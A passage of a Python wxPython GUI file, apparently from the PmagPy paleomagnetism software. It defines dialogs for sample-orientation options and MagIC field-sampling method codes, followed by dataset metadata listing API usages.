wx.VERTICAL )\n\n sbs3.AddSpacer(5)\n self.op_rb1 = wx.RadioButton(pnl, -1, label='1) sun compass 2) differential GPS 3) magnetic compass',\n name='1', style=wx.RB_GROUP)\n sbs3.Add(self.op_rb1)\n sbs3.AddSpacer(5)\n self.op_rb2 = wx.RadioButton(pnl, -1, label='1) differential GPS 2) magnetic compass 3) sun compass ',\n name='2')\n sbs3.Add(self.op_rb2)\n sbs3.AddSpacer(5)\n\n\n #-----------------------\n # add local time for GMT\n #-----------------------\n\n sbs4 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'add local time' ), wx.HORIZONTAL )\n #hbox_alt = wx.BoxSizer(wx.HORIZONTAL)\n\n sbs4.AddSpacer(5)\n self.dc_alt = wx.TextCtrl(pnl,style=wx.CENTER)\n alt_txt = wx.StaticText(pnl, label=\"Hours to ADD to local time for GMT, default is 0\",\n style=wx.TE_CENTER)\n sbs4.Add(alt_txt)\n sbs4.AddSpacer(5)\n sbs4.Add(self.dc_alt)\n\n #-----------------------\n # OK button\n #-----------------------\n\n hbox2 = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(pnl, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.OnOK, self.okButton)\n hbox2.Add(self.okButton)\n self.cancelButton = wx.Button(pnl, wx.ID_CANCEL, \"&Cancel\")\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.cancelButton)\n hbox2.Add(self.cancelButton)\n\n\n #-----------------------\n # design the frame\n #-----------------------\n\n vbox.AddSpacer(10)\n vbox.Add(sbs)\n vbox.AddSpacer(10)\n vbox.Add(sbs2)\n vbox.AddSpacer(10)\n vbox.Add(sbs3)\n vbox.AddSpacer(10)\n vbox.Add(sbs4)\n vbox.AddSpacer(10)\n vbox.Add(hbox2)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n pnl.SetSizer(hbox1)\n hbox1.Fit(self)\n\n #-----------------------\n # initialize default values\n #-----------------------\n\n self.oc_rb4.SetValue(True)\n self.dc_rb1.SetValue(True)\n self.op_rb1.SetValue(True)\n\n def OnCancel(self, e):\n self.EndModal(wx.ID_CANCEL)\n\n def OnOK(self, e):\n self.ocn = \"\"\n if self.oc_rb1.GetValue() == True:\n self.ocn = \"1\"\n if self.oc_rb2.GetValue() == True:\n self.ocn=\"2\"\n if self.oc_rb3.GetValue() == True:\n self.ocn=\"3\"\n if self.oc_rb4.GetValue() == True:\n self.ocn = \"4\"\n if self.oc_rb5.GetValue() == True:\n self.ocn=\"5\"\n if self.oc_rb6.GetValue() == True:\n self.ocn=\"6\"\n\n self.dcn = \"\"\n self.correct_dec = \"\"\n if self.dc_rb1.GetValue() == True:\n self.dcn = \"1\"\n if self.dc_rb2.GetValue() == True:\n self.dcn=\"2\"\n try:\n self.correct_dec = float(self.dc_tb2.GetValue())\n except:\n dlg1 = wx.MessageDialog(None, caption=\"Error:\", message=\"Add declination\", style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n if self.dc_rb3.GetValue()==True:\n self.dcn = \"3\"\n\n if self.op_rb1.GetValue() == True:\n self.op = \"1\"\n if self.op_rb2.GetValue() == True:\n self.op = \"2\"\n\n if self.dc_alt.GetValue() != \"\":\n try:\n self.gmt = float(self.dc_alt.GetValue())\n gmt_flags = \"-gmt \" + self.dc_alt.GetValue()\n except:\n gmt_flags=\"\"\n else:\n self.gmt = \"\"\n gmt_flags = \"\"\n #-------------\n self.ocn_flag = \"-ocn \"+ self.ocn\n self.dcn_flag = \"-dcn \"+ self.dcn\n self.gmt_flags = gmt_flags\n self.EndModal(wx.ID_OK)\n #self.Close()\n\n\nclass method_code_dialog(wx.Dialog):\n\n def __init__(self, *args, **kw):\n super(method_code_dialog, self).__init__(*args, **kw)\n\n self.InitUI()\n self.SetTitle(\"additional required information\")\n\n def InitUI(self):\n\n pnl = wx.Panel(self)\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n #-----------------------\n # MagIC codes\n #-----------------------\n\n 
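# Editor's note (illustrative comment; not in the original source): each\n # checkbox below corresponds to one MagIC method code. OnOK joins whichever\n # codes are checked with ':' into the '-mcd' flag, so checking FS-FD and\n # SO-SUN yields \"-mcd FS-FD:SO-SUN\".\n 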
sbs1 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'MagIC codes' ), wx.VERTICAL )\n self.cb1 = wx.CheckBox(pnl, -1, 'FS-FD: field sampling done with a drill')\n self.cb2 = wx.CheckBox(pnl, -1, 'FS-H: field sampling done with hand sample')\n self.cb3 = wx.CheckBox(pnl, -1, 'FS-LOC-GPS: field location done with GPS')\n self.cb4 = wx.CheckBox(pnl, -1, 'FS-LOC-MAP: field location done with map')\n self.cb5 = wx.CheckBox(pnl, -1, 'SO-POM: a Pomeroy orientation device was used')\n self.cb6 = wx.CheckBox(pnl, -1, 'SO-ASC: an ASC orientation device was used')\n self.cb7 = wx.CheckBox(pnl, -1, 'SO-MAG: magnetic compass used for all orientations')\n self.cb8 = wx.CheckBox(pnl, -1, 'SO-SUN: sun compass used for all orientations')\n self.cb9 = wx.CheckBox(pnl, -1, 'SO-SM: either magnetic or sun used on all orientations ')\n self.cb10 = wx.CheckBox(pnl, -1, 'SO-SIGHT: orientation from sighting')\n\n for cb in [self.cb1, self.cb2, self.cb3, self.cb4, self.cb5,\n self.cb6, self.cb7, self.cb8, self.cb9, self.cb10]:\n sbs1.Add(cb, flag=wx.BOTTOM, border=5)\n\n #-----------------------\n # Bedding convention\n #-----------------------\n\n sbs2 = wx.StaticBoxSizer(wx.StaticBox(pnl, wx.ID_ANY, 'bedding convention'), wx.VERTICAL)\n self.bed_con1 = wx.CheckBox(pnl, -1, 'Take fisher mean of bedding poles?')\n self.bed_con2 = wx.CheckBox(pnl, -1, \"Don't correct bedding dip direction with declination - already correct\")\n\n sbs2.Add(self.bed_con1, flag=wx.BOTTOM, border=5)\n sbs2.Add(self.bed_con2, flag=wx.BOTTOM, border=5)\n\n #-----------------------\n # OK button\n #-----------------------\n\n hbox2 = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(pnl, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.OnOK, self.okButton)\n hbox2.Add(self.okButton)\n self.cancelButton = wx.Button(pnl, wx.ID_CANCEL, \"&Cancel\")\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.cancelButton)\n hbox2.Add(self.cancelButton)\n\n #-----------------------\n # design the frame\n #-----------------------\n vbox.Add(sbs1)\n vbox.AddSpacer(5)\n vbox.Add(sbs2)\n vbox.AddSpacer(5)\n vbox.Add(hbox2)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n pnl.SetSizer(hbox1)\n hbox1.Fit(self)\n\n def OnCancel(self, e):\n self.EndModal(wx.ID_CANCEL)\n\n def OnOK(self, e):\n methodcodes=[]\n if self.cb1.GetValue() == True:\n methodcodes.append('FS-FD')\n if self.cb2.GetValue() == True:\n methodcodes.append('FS-H')\n if self.cb3.GetValue() == True:\n methodcodes.append('FS-LOC-GPS')\n if self.cb4.GetValue() == True:\n methodcodes.append('FS-LOC-MAP')\n if self.cb5.GetValue() == True:\n methodcodes.append('SO-POM')\n if self.cb6.GetValue() == True:\n methodcodes.append('SO-ASC')\n if self.cb7.GetValue() == True:\n methodcodes.append('SO-MAG')\n if self.cb8.GetValue() == True:\n methodcodes.append('SO-SUN')\n if self.cb9.GetValue() == True:\n methodcodes.append('SO-SM')\n if self.cb10.GetValue() == True:\n methodcodes.append('SO-SIGHT')\n\n if methodcodes == []:\n self.methodcodes_flags=\"\"\n self.methodcodes = \"\"\n else:\n self.methodcodes_flags = \"-mcd \" + \":\".join(methodcodes)\n self.methodcodes = \":\".join(methodcodes)\n\n bedding_codes=[]\n\n if self.bed_con1.GetValue() == True:\n bedding_codes.append(\"-a\")\n self.average_bedding = True\n else:\n self.average_bedding = False\n if self.bed_con2.GetValue() ==True:\n bedding_codes.append(\"-BCN\")\n self.bed_correction = False\n else:\n self.bed_correction = True\n self.bedding_codes_flags = \" 
\".join(bedding_codes)\n self.EndModal(wx.ID_OK)\n #self.Close()ls *.html\n", "sub_path": "dialogs/pmag_gui_dialogs.py", "file_name": "pmag_gui_dialogs.py", "file_ext": "py", "file_size_in_byte": 141142, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "wx.Dialog", "line_number": 26, "usage_type": "attribute"}, {"api_name": "wx.Dialog.__init__", "line_number": 28, "usage_type": "call"}, {"api_name": "wx.Dialog", "line_number": 28, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 36, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 37, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 37, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 47, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 51, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.EVT_RADIOBUTTON", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 62, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 63, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 65, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 66, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 66, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 67, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 72, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 73, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 89, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 108, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.tdt_magic.convert", "line_number": 131, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.tdt_magic", "line_number": 131, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 155, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 160, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 173, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 173, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 174, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 174, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.combine_files", "line_number": 178, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 178, "usage_type": 
"name"}, {"api_name": "wx.Button", "line_number": 181, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 181, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 182, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 184, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 185, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 188, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 189, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 193, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 193, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 195, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 196, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 199, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 199, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 201, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 203, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 206, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 207, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 210, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "pmagpy.ipmag.combine_magic", "line_number": 243, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 243, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 245, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 245, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 245, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 249, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 249, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 256, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 261, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 261, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 261, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 262, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 275, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 275, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 276, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 276, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 280, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.combine_files", "line_number": 284, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 284, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 290, 
"usage_type": "call"}, {"api_name": "wx.OK", "line_number": 290, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 290, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 296, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 298, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 298, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 299, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 301, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 301, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 302, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 305, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 307, "usage_type": "attribute"}, {"api_name": "wx.GridSizer", "line_number": 315, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 322, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 322, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 324, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 324, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 326, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 329, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 329, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 329, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 330, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 333, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 333, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 351, "usage_type": "call"}, {"api_name": "pmagpy.ipmag.combine_magic", "line_number": 364, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 364, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 372, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 372, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 372, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 382, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 382, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 392, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 401, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 401, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 401, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 402, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 416, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 416, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_add_dir_button", "line_number": 420, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 420, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 434, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 434, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 435, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 435, "usage_type": "attribute"}, 
{"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 439, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 439, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 442, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 442, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 447, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 447, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 447, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 447, "usage_type": "attribute"}, {"api_name": "wx.GridBagSizer", "line_number": 448, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 449, "usage_type": "call"}, {"api_name": "wx.ComboBox", "line_number": 451, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 451, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 454, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMBOBOX", "line_number": 456, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 457, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 457, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 457, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 457, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 459, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 460, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 463, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 463, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 467, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 467, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 467, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 467, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 469, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 469, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 470, "usage_type": "call"}, {"api_name": "wx.GridSizer", "line_number": 471, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 472, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 472, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 472, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 473, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 473, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 473, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 474, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 475, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 478, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 481, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 481, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 481, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 481, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 483, "usage_type": "call"}, {"api_name": "wx.ComboBox", "line_number": 484, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 484, "usage_type": "attribute"}, {"api_name": "wx.GridSizer", 
"line_number": 485, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 486, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 486, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 486, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 487, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 487, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 487, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 488, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 489, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 491, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 495, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 495, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 501, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 501, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 504, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 504, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 507, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 507, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 508, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 508, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 509, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 509, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 510, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 510, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 511, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 511, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 512, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 512, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 514, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 514, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 515, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 515, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 516, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 516, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 517, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 517, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 520, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 520, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 520, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 521, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 525, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 525, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 547, "usage_type": "call"}, {"api_name": 
"dialogs.pmag_widgets", "line_number": 547, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 551, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 558, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 558, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 567, "usage_type": "call"}, {"api_name": "os.path", "line_number": 567, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 568, "usage_type": "call"}, {"api_name": "os.path", "line_number": 568, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 571, "usage_type": "call"}, {"api_name": "os.path", "line_number": 571, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 589, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 589, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.generic", "line_number": 700, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 700, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 703, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 703, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 705, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 705, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 716, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 716, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.generic", "line_number": 716, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 716, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 757, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 757, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 758, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 758, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 761, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 761, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 764, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 764, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 767, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 767, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 770, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 770, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 773, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 773, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 776, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 776, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 780, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 780, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 787, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 787, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", 
